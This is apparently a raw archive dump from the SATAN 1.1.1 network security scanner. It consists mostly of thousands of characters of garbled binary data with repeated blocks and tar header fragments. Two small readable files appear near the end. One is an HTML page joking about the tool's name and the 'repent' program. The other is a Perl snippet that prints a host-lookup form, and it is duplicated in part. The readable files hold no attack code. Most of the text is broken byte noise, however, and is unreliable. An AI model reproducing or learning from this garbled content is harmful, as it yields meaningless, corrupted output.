@rn.╓╠╕ùè⌡É∩".ùI÷∙ï¢∙D¥.sαòò<.ÿá(╓r%ÜÑêÜkëü╓⌐╓¡⌐k5∙Ççëû┤.u≥8~α╚Ç▓Ys½.ë╛)jδ(5è9£%╤î4.VOñ£Z╟¢╜i¢╟Θë.ª¢┼╔£Φx.Z.¥┘╓9«T¥ñ5ç▀ëùh∙b╫╪.╚.¢-─ô.Θ.'╓Θç.ª8÷7¥æ9₧û╢÷/aqM(.á╓oOêYûbçεùƒv)áÿ.₧k(1φ...⌐áτ┘à.╚¥L⌡é(.o▐.{`.{σ.DêrÉ≈ë..¬ƒ.*..·?⌡wáªâσ~┴i!┌8+Üx.Ü..ΩÉ1¬ÿU.d⌡ΘÉ"╩'╞╔ ó&J₧l╤úëyû½ëp.zü─Ys@*÷.╩zDèσ.zñLG1J:Ñ[9û─Θb<ÜÑ¡τñP╫óE▒áS.za┌ùJπÑ.IçUixeüÑlzWh╩{..ƒ┼∙Ü.Fºo.qq║¢>.ª7╔ñ]YÆht..DAEyºAjÑ¡╢¿4Φû)º¿.:úmΘ¿-╘.|╓û&0∙¿ò╩ÿƒIÜ..⌐"╞⌐÷èô.╓F⌐.⌐╜σúô¿₧Eµòá¬¬½Φ;¡Zt│Ω⌐ƒÜ¬».üâ¬u*╓ëσ±û╜j½«║á£h╓─ëº.è½╕.½╕0¼≤Θ½%╫¼bjâ╨¬¼khÜ..¬╣¬½}%£├9¡s#¿.ëáε∙ºΓy¼ .ë¡╤Y╓πZp└╩«τ*òé⌐«ªJè╪.¡ »Z╙¼ºx..¬.R╟.▌j¡▀.*ÿ*º*¿₧.╔ÉαZªé°a╕┌»Q╓¡╧)&╒.ï.δ«Φ.¿╝z░ûÜ░ .Ñô*Ñ╬╩D..jªèÿÑJñ╬xn─.ª¬Y▒Xg¢╢.#2:░5k│¬╩ïS.▒].τiF·¬<[o..ëΩFò⌐i┤║Rí┌*s╓╫ÜM;D. ╡Tk.o╓¿;ê▓┘F÷Z 'X;ZOδÇ┐┘░"XlA[╢╗Üòµ╪H.╗╢O╩[.╓╢,.╖l{╢h╗kΦz╖C¬╢3i╡}ï╖¥.â.*╕vZ¡¼.▓╪r╕ê.«,i╕ìK»|½╖æ+╣░Ωì.t╣âKìî╕╣.Kîû°╣ÿ¢╣ó;║.┘fº;▓.ú║¿kÇ¡+╖m*G╞W¼÷.╗▒╦üΓ·][q»-3J'⌠ƒ╡;ó.≈[H.iQ+@≡y.Z.║Ñ)╢╘.╝#τf1╢¡h¢ ÑÆ.┼W╜⌐'╝GαC╠F░\╒æ╤;sì.╛╓╒╜∩╢¥.Ü∙i╝ûº╔╚£T░╗ûVXg·ƒ.Z;&¢gç·#δ{┐°.╝ÜH╛4.└Y¢╛+G└∩+è 'X;ZOδÇ┐┘░"XlA[╢╗Üòµ╪H.╗╢O╩[.╓╢,.╖l{╢h╗kΦz╖C¬╢3i╡}ï╖¥.â.*╕vZ¡¼.▓╪r╕ê.«,i╕ìK»|½╖æ+╣░Ωì.t╣âKìî╕╣.Kîû°╣ÿ¢╣ó;║.┘fº;▓.ú║¿kÇ¡+╖m*G╞W¼÷.╗▒╦üΓ·][q»-3J'⌠ƒ╡;ó.≈[H.iQ+@≡y.Z.║Ñ)╢╘.╝#τf1╢¡h¢ ÑÆ.┼W╜⌐'╝GαC╠F░\╒æ╤;sì.╛╓╒╜∩╢¥.Ü∙i╝ûº╔╚£T░╗ûVXg·ƒ.Z;&¢gç·#δ{┐°.╝ÜH╛4.└Y¢╛+G└∩+è ¢┤╚½┐`K½.£> ║¢Σw└¥xòΣH{.k┴.╝│╬w┴0V₧╝¢║╥Iª┌╟║pê`.l└).«áô£..║b.L═ïú7╠=|I║..┴±b₧à║┼8£├╪.─.8├┐║]:ΘàT┌ñε╦┬∞⌠─W╓r╟&─▓δ»╝.┬╦k»Ç5▒u.2L<.!ô┼Oπ▒ε┼├ó░.Q.ú.l╞s·₧m£╗╧ô.j<<#|l∙{vc\)└Θ─îÑAπïBΣ¬k[µ└T╡çτbe8⌠├/{╛├º╟.σ╟╖.k╣╓.st╝.ç.m .╔;.£2a╔╬)╡÷╠╛⌠"╩s≈╔.¬óP░aªûqY|╩─╡╜'µù0÷╩6,û╡∙e«╗╝▌[╦├╗N╘Γû<W╗╜<╝╨+]║îè╡L╠▐.u[σ╗║xt█╓L.#⌐╠,ó╦l═rëyM╖╜┼,═°IFéd╔╪╠'┐î5¡D╟D╫¬▌LfZñ╔y.╝⌡$2Ω▄═σ¼╝P<[<⌠╬╕iá¬î.[K╦⌡∞═±.ï▄╓ì║¿╠┼▄╩≥..╪╙╩├<╦A,┐q.rσ╞╦.G╬=Σ├uvù.!╨╜.:.=wC|╠σ∙..φ╧φ½.F'╦}jè"}d.]...p5jnì╠¡.ô╝.h.╖.∙l(./Ró.╓. í+ûñ≤{_│ú╨ë½Σ24╖⌡.╟÷C│Γ½┴≤Éσ¡.╘▐╢╘┘.ó╣T╒µáúb.x╖{\[=N.Φ3Y-.d╜,ΣXÇlìyí╦j{.╫╕╒.╨F$f=.∩¿b:T╫ù..▄.╤ñτ╒║Gî∩▒ º¬tíñ╓'¿╫Ω%gIG├│σ_0╜╞╔X═...':pÜ╜i┘Xlê=┼â▄k..║.-╙=s╟₧╜└á.┘è¥╡ô⌡╟w╞┌╔∞q│ìkìMé.σ╓«%┘é╠█w}=]┼+É⌠╪.║k⌐ì╞Ét╫0½▄.╚▄∩8U─.╞╜t▄"╖D8v¿p+╒▄É░┐¡¥╓d┘╬┘╫0¢┴.╖.∙l(./Ró.╓. ⌡à╫▌gç6J∞∙S ¼▐σ"┘║¡d£;▐╠£┼FD▄Ej╦≈¥êÑk2ë╜ñ╓e╦.M.av/⌠M6½ï╠⌐£`X6dï[╞║ß▀..▀▓âKα¥ùp¬e.>Vë.p&¬_.nß..ßµ"ß█ _.}╧ê⌡.ù÷Γ*~ù ─L▐°JSσ░eσß∩µß/2I¬¡┤Φï╘cfΓ.."Ü╚gΣIΓù═y<ÑSµ¥╥.9Σ.N┬Çm.ó.F4Ω╖.^c».Nα4ª─.n.T█a╣⌐HÜ¼≤GƒB'É.N╫Cê┼╚╗⌐0à╫onâb,sτ.═.9«4₧@JÑτ╤¼B░ì¬il8X [░.π%╗.æ∞σVô.╪∞.l▌û╨hªßmÿ.+£Φ.─╡Kεs₧╔~ε╓;>t─m7f▄áεE7FΩ╞▄&/~╨≤·&.¥7ù.│¡▐4≤≤R╧+ΩjªΩª┤î╜.r▐VZ-yδ╕.┼║.K┬.^FQµglZ¥⌠∞╥[╪÷ì∞M╣Θ½2ƒ∙T┌.├∞╨£1`╛│5┌╡║╫╦.⌡.╡8φ≡]¼▐æεσ~╡╫.╘τ╛╡M&Γ╥╖ε█n'▒.Ñ▀ç╙P╣g÷▐û≥─╦ï₧zcïM╧J≡░£─╧.δ/NΦ╥║≡┬\h─N.┼Uû./╜à3╠7₧I▓₧Θ6┼.!┬hF¢∩`▌.≡«Y£.KT.φ.┘L∞╨- ╬&╢₧^╬╨*≤..╓≥.o o█≡{ε╨î·╫e═▐╧-dcδ.C┐nG.g─<ΦI»⌠∙îΓ?┐τ]RF6┐╥A÷7.┼ΩΘBαQO┼».Θ#..a╚≤╓δU╙¥╛..▐g4≤≤R╧+ΩjªΩª┤î╜.r▐VZ-yδ╕.┼║.K┬.^FQµglZ¥⌠∞╥[╪÷ì∞M╣Θ½2ƒ∙T┌.├∞╨£1`╛│5┌╡║╫╦.⌡.╡8φ≡]¼▐æεσ~╡╫.╘τ╛╡M&Γ╥╖ε█n'▒.Ñ▀ç╙P╣g÷▐û≥─╦ï₧zcïM╧J≡░£─╧.δ/NΦ╥║≡┬\h─N.┼Uû./╜à3╠7₧I▓₧Θ6┼.!┬hF¢∩`▌.≡«Y£.KT.φ.┘L∞╨- α.&../é..µn▐╧-dcδ.C┐nG.g─<ΦI»⌠∙îΓ?┐τ]RF6┐╥A÷7.┼ΩΘBαQO┼».Θ#..a╚≤╓δU╙¥╛..▐g4≤≤R╧+ΩjªΩª┤î╜.r▐VZ-yδ╕.┼║.K┬.^FQµglZ¥⌠∞╥[╪÷ì∞M╣Θ½2ƒ∙T┌.├∞╨£1`╛│5┌╡║╫╦.⌡.╡8φ≡]¼▐æεσ~╡╫.╘τ╛╡M&Γ╥╖ε█n'▒.Ñ▀ç╙P╣g÷▐û≥─╦ï₧zcïM╧J≡░£─╧.δ/NΦ╥║≡┬\h─N.┼Uû./╜à3╠7₧I▓₧Θ6┼.!┬hF¢∩`▌.≡«Y£.KT.φ.┘L∞╨- .ê=6[ƒT├ìov┐.╓.$▐·Ω_▀α`╧\╞₧1┐Vhm∩≈,.Θ▒u└╬ñ»ìOUx iôûTµ┼╣σ.├½DσW.≈bJ∙`f.J╜├tεπ¢╧∙σπ∙δ¥∙%╙º½»▓A.q7.≈v.≈░.┌á,≤Dú≥ú∩╚u╬.9┐MB!.π╪i¿∞⌠CV.╟/╘*_°▄Üß'l°ó¥fè┼K.ï⌡└`@╣£∙é2`└ƒ╙.╤»·GW∩Σ.⌡╫aσ╪ƒ=6¡⌠@Γ∞⌐É·I·╫1..╡8φ≡]¼▐æεσ~╡╫.╘τ╛╡M&Γ╥╖ε█n'▒.Ñ▀ç╙P╣g÷▐û≥─╦ï₧zcïM╧J≡░£─╧.δ/NΦ╥║≡┬\h─N.┼Uû./╜à3╠7₧I▓₧Θ6┼.!┬hF¢∩`▌.≡«Y£.KT.φ.┘L∞╨- !─#;*.└.i⌡ìDσW.≈bJ∙`f.J╜├tεπ¢╧∙σπ∙δ¥∙%╙º½»▓A.q7.≈v.≈░.┌á,≤Dú≥ú∩╚u╬.9┐MB!.π╪i¿∞⌠CV.╟/╘*_°▄Üß'l°ó¥fè┼K.ï⌡└`@╣£∙é2`└ƒ╙.╤»·GW∩Σ.⌡╫aσ╪ƒ=6¡⌠@Γ∞⌐É·I·╫1..╡8φ≡]¼▐æεσ~╡╫.╘τ╛╡M&Γ╥╖ε█n'▒.Ñ▀ç╙P╣g÷▐û≥─╦ï₧zcïM╧J≡░£─╧.δ/NΦ╥║≡┬\h─N.┼Uû./╜à3╠7₧I▓₧Θ6┼.!┬hF¢∩`▌.≡«Y£.KT.φ.┘L∞╨- E.╚1╙┤.a÷ôV{q╓¢wJ∙`f.J╜├tεπ¢╧∙σπ∙δ¥∙%╙º½»▓A.q7.≈v.≈░.┌á,≤Dú≥ú∩╚u╬.9┐MB!.π╪i¿∞⌠CV.╟/╘*_°▄Üß'l°ó¥fè┼K.ï⌡└`@╣£∙é2`└ƒ╙.╤»·GW∩Σ.⌡╫aσ╪ƒ=6¡⌠@Γ∞⌐É·I·╫1..╡8φ≡]¼▐æεσ~╡╫.╘τ╛╡M&Γ╥╖ε█n'▒.Ñ▀ç╙P╣g÷▐û≥─╦ï₧zcïM╧J≡░£─╧.δ/NΦ╥║≡┬\h─N.┼Uû./╜à3╠7₧I▓₧Θ6┼.!┬hF¢∩`▌.≡«Y£.KT.φ.┘L∞╨- A...cd>4\┘╓Ñ╠╙,╒¿~±\▀∙▐╜├tεπ¢╧∙σπ∙δ¥∙%╙º½»▓A.q7.≈v.≈░.┌á,≤Dú≥ú∩╚u╬.9┐MB!.π╪i¿∞⌠CV.╟/╘*_°▄Üß'l°ó¥fè┼K.ï⌡└`@╣£∙é2`└ƒ╙.╤»·GW∩Σ.⌡╫aσ╪ƒ=6¡⌠@Γ∞⌐É·I·╫1..╡8φ≡]¼▐æεσ~╡╫.╘τ╛╡M&Γ╥╖ε█n'▒.Ñ▀ç╙P╣g÷▐û≥─╦ï₧zcïM╧J≡░£─╧.δ/NΦ╥║≡┬\h─N.┼Uû./╜à3╠7₧I▓₧Θ6┼.!┬hF¢∩`▌.≡«Y£.KT.φ.┘L∞╨- .'─ìC".æ╔PL.½.òQΘ÷ZU KYΦs╕╡~ºF¼..6ƒ╤i⌡.╗.1HkîWnc╩hOz¥▀≈δ¥∙%╙º½»▓A.q7.≈v.≈░.┌á,≤Dú≥ú∩╚u╬.9┐MB!.π╪i¿∞⌠CV.╟/╘*_°▄Üß'l°ó¥fè┼K.ï⌡└`@╣£∙é2`└ƒ╙.╤»·GW∩Σ.⌡╫aσ╪ƒ=6¡⌠@Γ∞⌐É·I·╫1..╡8φ≡]¼▐æεσ~╡╫.╘τ╛╡M&Γ╥╖ε█n'▒.Ñ▀ç╙P╣g÷▐û≥─╦ï₧zcïM╧J≡░£─╧.δ/NΦ╥║≡┬\h─N.┼Uû./╜à3╠7₧I▓₧Θ6┼.!┬hF¢∩`▌.≡«Y£.KT.φ.┘L∞╨- .Γσ▓V÷..⌡Ü╪≥`...!#y┌┌:î.%3.iP╚╩4ACES..S..G...+ETaceQ╡R...MgA.±\mvâà.mâ║─ç3e:='îòúÑ'/K▀éáº¡£(.│╡┴├ïp┐┘¼U╩┼»8╗~!¼╒π.σ╟╙▌t;═τ.α≥α╝δ⌡.£VΘ.>N5▄..├».<` !F4╫╠╥A7Φ$ªë╙─┘3Ç.AJ┬âIâ├1╡B.⌠º%ƒ.ç)a╬.∙R┼╜.ª.╞.".%I┼:ü╩∞┼óaâ£A{l£┴╙σGñO½t+╥èf>ºP/⌠Γτ≤'V»ÇFµ*ydc;«_u÷╜ùí*Z╖Q╧.ΩIQ∞█.╒V.kkù∩╬í.τ┌╘┌≈ε.F{ì.V|.qMW7╬]].¿e?╜ô1│¥úTWV( MJ╬╠.≥╪╠º]░*Σ╤.Y╤ú+»d..⌡bJ%ì▓n.─÷d_â:╗.KÜx±Γ╡A.▌¼.g█▐╛-▓â.┌x.u1╒-[─▄╧ÿl[syB╝¥09½/⌠Γτ≤'V»ÇFµ*ydc;«_u÷╜ùí*Z╖Q╧.ΩIQ∞█.╒V.kkù∩╬í.τ┌╘┌≈ε.F{ì.V|.qMW7╬]].¿e?╜ô1│¥úTWV( ┤7^¡¥{┤ôSmbkL╛/Gσ4▒½Grτx{X╖5Kµ&vΣ≤╧â▀░iç.▐α{'5π...,╡µ╕τ=..îp..╕!«@±na"╝[.ñgA 'ñ░┬A╘ ½).7∞É¬.Gl┼F.;#é╡║$╠ì4.σPε..¢╙┼2 .9─¢..,±└╩^╓φG$┐P─.╬á─╨4*C\╨╛.KlR╛⌠╪ï.!"¢.í?.ô.rH.ú.î═ë.π┼.▓$,╙╡;╔─.╓╪..╬├9.[JNTî.q╬.I<╔╧1.δ¡╡5.ò1▒D\$të┐b.4╤.ΦïëQP┴..ô╬L┼⌠ïR.╖Æ═─Q5Ñ.╕ gE⌡╨.a.òO?'⌡...I<f05mì5æ,│bë╬╘P╠.8î&:╧═.»AsV4¡{aPc┼φ╤.e{}.W!.¥Æ¬O?e≥ZLΣ╢.┼£σV>d_ñ.çt▒*v]╨ñ3¿┴?▓.╓ZHC¡»£R ╦íαy⌠╜ôT8ù:X..tT÷╒iæ╝░^±≡═.3go.pR+wKgßñ╠ ┼─x.Uq6{.;-ºíF÷N6║:ìe█./>9(î...Φ.}v/í╧v╬╬á─;▐╟K.ßm┌╢t]ì÷.⌐#Ü┘ΓUi╓iαÜ÷I9I¼∙.≡íâε≤╓l}è ¡ß?.Y┬yKú┼ε╓╩í[Bhφd▌b.aûs≤ë⌐.¬╗╦╜í.┌.╝7E.≡"▀ε╥╞êƒ÷╟pH5T╝_ÿ█,Z.[±B.▀vq:àφ╟.ƒ┌d│┬╚≈%.Q╒k╔╥ëV.≡╘ ₧«V─q.yZ.ëΓΦYR▓╓.≈╖~▀<ß¿té╡╓τ)¬╟.≡ñ≈▄i."∩.]òy'╝x¡íù4╙Rsû(▐π]ù.r3¼┐~.╜╗ƒ.└ΩC:ƒ±µì|W╦m┌_πvtε. 2T¡|.▒_.ô#╡∞φºhh[p.╕Σ8⌡─. tƒkΓº.═QG .DΣ±─.┴αæ¼#sK.╚...╝u╚â─╙á±8(.╬Σ«v°.sç..h.íY-H.îB├¿├⌐¥`Hn..U1p°╜dA╧i┌.".⌠╢─ΦÉ╧êGt¢.!14æ╡p=t╗╥ ï╞£.Ü.(▒Kß.Wµ0╓..ï SNd╬4╕!èêÇ▐│"<Æ╚░±°δî¥kc.╚σ#.Rk?f⌐#¡.ç─>.nHp[$.B├¿├⌐¥`Hn..U1p°╜dA╧i┌.".⌠╢─ΦÉ╧êGt¢.!14æ╡p=t╗╥ ╕⌐Dy═mÉ|┌Y╚X╞±=2l:─.'..I.╜iìN┬ñ..├º╞Ñ.2á▄┼.\Θ╟ë%oY±ß .1G─┼α≥òè.Ñ.τ.└_.G$T╙╧░«σ%*▐Ω)3▒S.ë.B^ólÿ╝a.ADù½iJïÉ╒≥è≤b∙9∞┼)£a╪&)ªúò>9╙Æi╗.J5┘ê╟r.πÿ<.E.-Y»~.╙K'╗╬}êó= ß3.α#Γ9U5╠..qtùCσ_$âP¥∙╥v°yÿ0µ)+...kΦk£wN╓╔f╬┼á.]óDe╔╛σ╛ªñ&ΣV@.gF÷j.O..⌐I∙τìn▐╦ƒîr%<π)╧╓¬╘÷╗*\.╙K'╗╬}êó= h⌐ ÷1péó.jw┬..46╥₧F3g*₧ùLª.─⌐Oà*.3Zç╓▒╨½┌ÆΦ5├║Sj.«½væΘP»¬+°┼π£░L½Z.┼1q!┼ñw=├QZ.╫£· ⌐U⌡.S╖╓V╖^╤ëîσ▄T╙Γª└"╡º╬áMY▌'H╠ó≤Rè H9φ*─├─╢(f],.ºZÜóªlûÜ.╥i)┐.┘¡≥k»|uù_⌐@.αUtm.d"^ùÜ╨╔)¼lÑM-T_q╚╙)p<9z¥τΩj(zI≡┤¡─-c*û7┴èòiΩë!⌐~X┘-.╖║╗█«lσ █∩Ñ.½JUSx≤YDÿ┌.v╫Uò)φ¢┼.5≈ô┴Σ∩.-Σ╩╙R╞ú.jd~#±;"^ùÜ╨╔)¼lÑM-T_q╚╙)p<9z¥τΩj(zI≡┤¡─-c*û7┴èòiΩë!⌐~X┘-.╖║╗█«lσ >û¬ê╒*mM;`═Γ4XΩ=ß^.)╚═.7╓\MKqàz▐.╛jw¼∩kk╣a╞@2pΣò≡ÿT.H.≤┬EÜS╨wáδ╧T╢É╡▄=±=╟I┴ævc.5n.J╖9*.è8.`d2╤`╫Γ»|iú.~╓.;,M⌠╛.QΓ<p┼.{°.uε.║êEªY┴▄Aè╥XWτ.qî÷vV±Ü╩╡σ)╫îG£$█b╩░o.cOºΦF<O╘║i╢≥A∙¬╤┌─vê..▀Mæ▓µbV8U▀▄π╝.∞`┬╥╤[P÷MíΘ⌐├'p>╥▄─£≤i┼E█∙Yâ÷┤÷w;d.Ñ.╒ç.YΣ? ┼IwV╛Ü,▓t∩Zδ.╙┘╧2âbÜ.£>E.W╙Ií`D .╧]ìZƒαu╡~7*╠f.╢M<{g┤Ñ}clW8╓6\m-Σ╜Θ╬.fò¿i╤qSz⌐▌°«ér.t;.U├┌╝.┌─L.╡{X.xït╦W╗QG┴╜è .├ó}Nα¼.^┼ÿm╡╥├±.W...▐Mÿ[╠ç▐÷─.¥ªqî+d.÷LM.«┬.+.ï╤┼≈2½▌.îo.î└σ¡╟ó╒r.w{-.G─.M.╢0%£.E>.H∙╟h.╗,µ..f╞%gSúB.Γâ.¼║C⌐Ωs├ê╚4/ Σ═╫\^┼ÑJ╙<+I╛H⌠]╗.╣¥⌡8]KmjJτ╓∞ß=╙╓╣«k6║.φß(lVτNw¼╧Vδ.╧╪ÿ╦¬╡÷C÷M┌.¬α╓-\σb·nOO|vUy≤O└°lI┼|çihM╡7∙Θß╢eëß╛8ß-╛≡É/.vE>ßûq╛ë..:▌.╛α▓╖v▌%ù=í║εUù═U┼╬┴á»TB.$┐ïíú┼▒;ƒ .╪yú▒╜}ù≥╒.₧╨|G\1Q╜╜5±δ|ï.╛╦W.╗≥╧næ╩+K▄╧t¢í╬.o╡zt└|.èi.ü0⌠zg╓~cì∩p*'∙ε╧┴~ï.≥ª⌐.gqXO."'─╝Θ.εóu8M.zë÷..é¼N..░╛ΣΓ»₧c¿₧╞..j▓óOL╠ï.╡H¬\ê¿\∞┐zì[° ¿╠Fì╛O╨^Σ.ï .▀.÷≥ .!Ω.)┼.z╔ô╕çw¼ºµx ≈B..┼.┼.εu.pû╝½.┤Eσbτ.a.µîeiΣ╨µ6╨.uoyε..ò∞▓ÿ╟≈£É¡╛P▄.Ñ _¡╩á.╫^.i¿+≡êk0H≡?.┬.Ω..≤α.╬ûêφ>l.üe╛Æa╙⌠...ì...⌡è)ε.p.░É`.╦µ«░⌠Σà_.≡.Kc ┐ ┼NE½~ΦaÉ░.τlF6æz:.Éÿ.≡BMº&q≡╓φ±Z╨í╨,ò ìδ.░..ì...⌡è)ε.p.░É`.╦µ«░⌠Σà_.≡.Kc ,k.I¡ 1╨α*q─·Θ╛N/V.¬.]æ9σPß─i╠d╚£Ωp.Wcx¼.W.µD.±╣╩═⌠6..C─├¿╔├▓╠.╗╨╣£Q═╓q.U╦DÉ╩⌡Σ»⌡^∩▌÷▒I .≈╓┼ ┐¬Ω|ê▓H±·╩Q0÷▒.â .╤M|ê▓H±·╩Q0÷▒.â |.±v┼.ßé≡┤¼e°/E╕..╓.╟é«ü╢Kmx.nÜΘ 1..φ.qh.=╧!.s½≈TM╓.╟é«ü╢Kmx.nÜΘ .)$)r║NEτ£#.≤±≤░,%█iw╪─▒DR║.g╨,2.'ê.q▓.├æ.┴èK6).M▒╙b.í∞É&çæ(ï.%╧╤▓÷≡.º2¿ ìkx¬&)σ╗╢ß$╧.J▓r∩╘æ%M.!5ï.âR`─æª╞≥!!.∞.─╔╘r-¥.Qj▓g.â.≈íJ╚R.3.&▌ìè·≥.Σ(j▐ÆX≥τ≈┌─y⌠╤╠╠≥,├L/cqÆ╩Σ]÷+bÿ▒.╔14╒¡ê╕░.`ε3.qÑ╓)=°σ/┴∞┌..*╜∩.?σΘ▄æ /ΘΣV│1æà7σr0±O≥┌//#æ.ç2.WΦ'╔─╧ÿr≤ΣQ4╫j.s.╠╬~É/ü¼└^¬-╔.5..8k±╛^▒9.N█.±∙░ô└bK3ó▓8╜≤π ÉH╕│▒≡≡6»ô.;.n╞HPês╡bs.sÆGΓS.?Q9à┬\&»≡.ε╞÷╨7A╥*.¼j─..àRAKp[J.É.│.EÉ..I .╘¬.o=═╙> s.╤..sîCSS.#┤n╞HPês╡bs.sÆGΓS.?Q9à┬\&»≡.ε╞÷╨7A╥*.¼j─..àRAKp[J.É.│.EÉ..I Σσ─÷.╩ª$/≥,.çßC+ε&ïεK.)F╒L@401æôD/.╬|÷Yés..O»b╥╥.÷@┼a3│qBO╘r╪2:['÷ΣσA?+╗─φH]δ.▒%1L.LGhªαj∙╬î>aó.≥ΣK1j7Y┴.E╘ï≡. ╫aM¢.┤Mπh-═tGσt9ï∩@▒TGç═#-╤Ç>..δ┤K..;.╒.ô╘╓ ╙O-╙.▓≤)½KJ+Ω».⌠PKTSïO │i πt╘┌º*.-S.│EWM⌠p╘T┐╙ü¼Rc┬T╚8╙∩¿'H]UVUl.═.R╤.KûúW⌡mBß╘W L,▒+`σ.Qu≤RA1Yò52/SK█E|┬PJ.TΦhçB½U(¼U.n.╜è÷1.T┤\SZM⌡ù.σ┌û¼.δ¡[ú«G.5\╫NÑ─TRM╦6ìt⌠l╒5±⌡.i .ü).KKÆΦ╡..v`Yò52/SK█E|┬PJ.TΦhçB½U(¼U.n.╜è÷1.T┤\SZM⌡ù.σ┌û¼.δ¡[ú«G.5\╫NÑ─TRM╦6ìt⌠l╒5±⌡.i π.┼s₧ñΓL┴T^.╓a»ô."6^╒.¥|T┴b.c.M°.≥Rb═#L╜n$ìUdδ╒Ekod≈QaIVeWûes4│^v..u^ß╔b/╓f≤..╟U\.ôb.Éfk.hC5.s╢╬p╡.QòƒÆViº÷.ç╓h½û[A.i⌐6╘╞╥ÿH╓tó.?▒÷¬D-d╗╢ï∞ε^[÷hMªÆ╬╒cS╒╗Σ4mU÷\)e$/.#úlg╫π╧╨cj╗VMC¼Q╒Æm.╞G@æ9ôîn╤╓n█ì┼.r¥.╥Yò╩B╒pEτ▒U┘╒Wφφ_.≈`.UA╫/ke.a▒¬n!≈9w..3ôrI╫.à+.∙ô^╙╓∞.ù ß▓ΘhÇ┼▐zk.swuπpXU╫Juk╖╛+»d÷[;W.Y3╚+╬NzTP╓.ü░│xà╖.eûZ⌐3|₧≥Qà⌡_┼7{.∞`8u';vl╪c;╤*x╔wyï5t¢σ.}¼╗▄≈}ß╤°┬╫8üΣ¥▄ûφ._w5╣═4+U1.3W.ÿ⌠·ñ>°..π.P┘╫v.x])╪Sm╩-╜&X.n.╣╖éA8fEGyM╫c..¢╘╖yCx▒,æï.Wé╗ {W8Σ#à>&÷+±ÆgUxσ7UIl╪gσ╢Vê¡vwÿçΘïHq.ÇπW▐╢╫ê¥8~i&.ùpi.8hΣ÷éƒ8z/─P«⌠+!╤/_┤ï9.ï│x▀jLe.≈o╧÷î╙ôê.╖î¥«L≈Θs97╜╢.╖êßXá≡!`.╬ºXñhí.┼≤8╤╛≈O╚vm?úìSXÉ.╓Éwùσ╥.e╟èb╔╕æ∩.Æ╫╚.a°σê≈ì-╣{e.∞▒.ƒ¿:úUσ?yσIê─.ëcel/╤╒ôS9J╠x.τ.ìíû∞hFæ╡│Ægy÷FÿX⌡÷g.,∩≈ùàùCΣºG.X?∩ε┼█╠R┼.╓╔╖òkxƒF╔█╢µ÷ º╓Ü.ÿσ▓╒CêUüàR¥.╓æ╜╣≥XΦ0.)s[.G¿.z╙y₧%iYxΓ╓ñÿMçïJ[ÿ₧..éI'τ¬.ô@êg&W.+!╤/_┤ï9.ï│x▀jLe.≈o╧÷î╙ôê.╖î¥«L≈Θs97╜╢.╖êßXá≡!`.╬ºXñhí.┼≤8╤╛≈O╚vm?úìSXÉ.╓Éwùσ╥.e╟èb╔╕æ∩.Æ╫╚.a°σê≈ì-╣{e.∞▒.ƒ¿:úUσ?yσIê─.ëcel/╤╒ôS9J╠x.τ.ìíû∞hFæ╡│Ægy÷FÿX⌡÷g.,∩≈ùàùCΣºG.X?∩ε┼█╠R┼.╓╔╖òkxƒF╔█╢µ÷ ╣~ªW7α.╢6ë▌Ω°(.zóO9τ«π▒└┘fV.}║╓ó│.b.J.⌠,/σ.W3e┘ú.±7..RKf%E°gOεïQzª.y╓u.xε╬÷a:ªeÜª=zzf4á.8nΓ27]╩ù}Z"-úI)ªE .Vç╖ΣôÜÜIFiñcè╞h.Tw)º║½¡Γ¬[┼ à.A¼≤të╧½ºÜGòYlÿ÷Wì.╝╨┌½WÜï-4≤T.|.%╩ΓZ«├.ád..+.|ße»∙Zú¢·╓⌡╟(U┌·..ƒ╓é¼┌.û[sF.ÜT.¢ª╫:[k..«ΣM.ÿ▒/█ƒºw─E.P${rÇZªO:┤∩q}┴z£+fQ╤≤o2÷╡ôÜr╟.!Ñwd╨.%~╠╢π·.º'!╗Ny.ÜD;¡.úü█n┼yÑφ╓▓┼╓▓_╘[>x╣⌐║f╝O¿ò..┼.F╤┘║/∙░.)t┬╓òí.╝m{┤ ;ú.█╣üa_╤╗▒Yô¼╬E│æσ5π{╣±zF_╗ùQ9┐E;[pz╝¡─┐..└.╔╓≡█═..┴.▄éâ╓╕█▒║.|»≈╗»G╕┬5<A.Ü╜│.┐7▄=┬.B╕▒.A<─â[╝-σ{┐.┼¥╫╡3{╡].}⌡.·Éz╞½╣╣╒O╣q£₧Yzw{<╚a./(\╚.<╞y▄╚..╔ò╝╔13╔¥|óS;╩⌐\9o╝╩i.╩▒\╩e|╦¥╕╦╜▄ê»<╠╔╝╠═.╠╤<═╒|═┘╝═▌.═ß|₧....;íâε≤╓l}èsatan-1.1.1/html/name.html............... ........................................................... 600 . 465 . 506 . 711 5737207304 10431. .............................................................................................................................................. ......................................................................................................................................................................................................................<HTML> <HEAD> <title>SATAN Name</title> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC=images/satan.gif> SATAN</H1> <H2>(Security Administrator Tool for Analyzing Networks)</H2> <HR> The name suits the program, in our opinion. If you don't like it, feel free to call it "SANTA", which is, perhaps, a more user-friendly anagram of the acronym - you can run the <I>repent</I> program if you are really offended. </BODY> </HTML> 3ôrI╫.à+.∙ô^╙╓∞.ùß▓ΘhÇ┼▐zk.swuπpXU╫Juk╖╛+»d÷[;W.Y3╚+╬Nsatan-1.1.1/html/reporting/......................................................................... 700 . 465 . 506 . 0 5742521544 10567. .............................................. ................................................................................................................................................................................................................................................................. .....................................................satan-1.1.1/html/reporting/satan_info_name.pl....................................................... 600 . 465 . 506 . 1222 5737240703 14330. ................................................ ................................................................................................................................................................................................................................................................. ...................................................# # Report host by name # print CLIENT <<EOF; <HTML> <HEAD> <title> Hosts - By Name </title> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Hosts - By Name </H1> <hr> <FORM METHOD=POST ACTION="satan_info_host_action.pl"> <strong>Enter a host name (<I>host.domain</I> preferred):</strong> <h3> <INPUT TYPE="reset" VALUE=" Reset "> <INPUT SIZE="30" NAME="_query_host" Value="$_query_host"> <INPUT TYPE="submit" VALUE=" Display host "> </h3> </FORM> <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> | <a href=analysis.pl> Back to SATAN Reporting and Analysis </a> </BODY> </HTML> EOF D> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Hosts - By Name </H1> <hr> <FORM METHOD=POST ACTION="satan_info_host_action.pl"> <strong>Enter a host name (<I>host.domain</I> preferred):</strong> <h3> <INPUT TYPE="reset" VALUE=" Reset "> <INPUT SIZE="30" NAME="_query_host" Value="$_query_host"> <INPUT TYPE="submit" VALUE=" Display host 